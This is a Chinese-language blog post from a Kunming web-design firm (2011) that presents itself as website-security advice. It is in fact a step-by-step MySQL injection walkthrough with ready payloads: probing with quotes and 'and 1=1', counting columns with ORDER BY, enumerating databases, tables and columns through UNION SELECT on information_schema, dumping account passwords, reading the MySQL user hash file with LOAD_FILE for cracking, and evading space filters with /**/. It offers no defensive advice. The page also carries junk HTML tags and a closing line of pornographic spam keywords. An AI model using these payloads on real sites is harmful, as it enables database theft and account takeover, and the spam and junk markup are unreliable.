<address id="bbrpp"><listing id="bbrpp"><meter id="bbrpp"></meter></listing></address>
<form id="bbrpp"><th id="bbrpp"><th id="bbrpp"></th></th></form>

      <strike id="bbrpp"><p id="bbrpp"><dl id="bbrpp"></dl></p></strike>
        <noframes id="bbrpp"><address id="bbrpp"></address>
        <form id="bbrpp"></form>
        <noframes id="bbrpp"><address id="bbrpp"><nobr id="bbrpp"></nobr></address>
          <noframes id="bbrpp"><form id="bbrpp"><th id="bbrpp"></th></form>

          云南網站建設創新企業 昆明多彩網絡公司

          |網頁對話|電話:0871-63215311

          網站制作安全之mysql注入技巧

          來源:昆明多彩網絡公司 日期:2011-09-19 閱讀: 發表評論

          mysql注入指得是通過程序的漏洞(比如沒有過濾),通過執行sql語句進行入侵網站并最終得到服務器權限的行為

           mysql注入大致流程:

          1、得到注入點,在頁面參數后面加'或者and 1=1和and 1=2測試,如果程序報錯或者有一些異常情況(比如執行結果不同)發生則表明該頁面有漏洞存在。

          2、在參數后面加入 order by 10,10,如果沒有什么反應則將后面的10繼續增加,如果報錯就說明字段數少于該數。

          3、暴數據庫名,假設當前被注入表的字段數有3個,通過下面兩種方式得到

             3.1 union select database(),user(),version()

            3.1 在后面加入 union select 1,SCHEMA_NAME,3 from information_schema.SCHEMATA limit 2,1,將得到數據庫名稱,第一個數據庫為information_schema

          4、暴表名,and 1=2 union select 1,table_name,3 from (select * from information_schema.tables where table_schema=0x6861636B)t limit 0,1    0x6861636B為數據庫名稱轉成了16進制,用小葵花工具轉換得到,通過上一步可以得到,注意limit前面的t不能省略。

          5、暴字段名 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=0x61646D696E and table_schema=0x6861636B)t limit 0,1;0x61646D696E為表名,table_schema為字段名。

          6、union select 1,"字段1","字段2" from "表名" limit 0,1,就可以得到帳戶和密碼了。

          7、其他:得到root的密碼通過LOAD_FILE(’C:\..\MYSQL\DATA\MYSQL\USER.MYD’)得到用戶的HASH散列,之后用CAIN爆破…如果程序過濾了空格,可以使用/**/相當于空格作用

          發表評論評論列表(有 條評論)

          網頁對話 0871-63215311
          国产无码字幕在线_碰超免费人妻中文字幕_先锋亚洲精品资源_亚洲人妻电影播放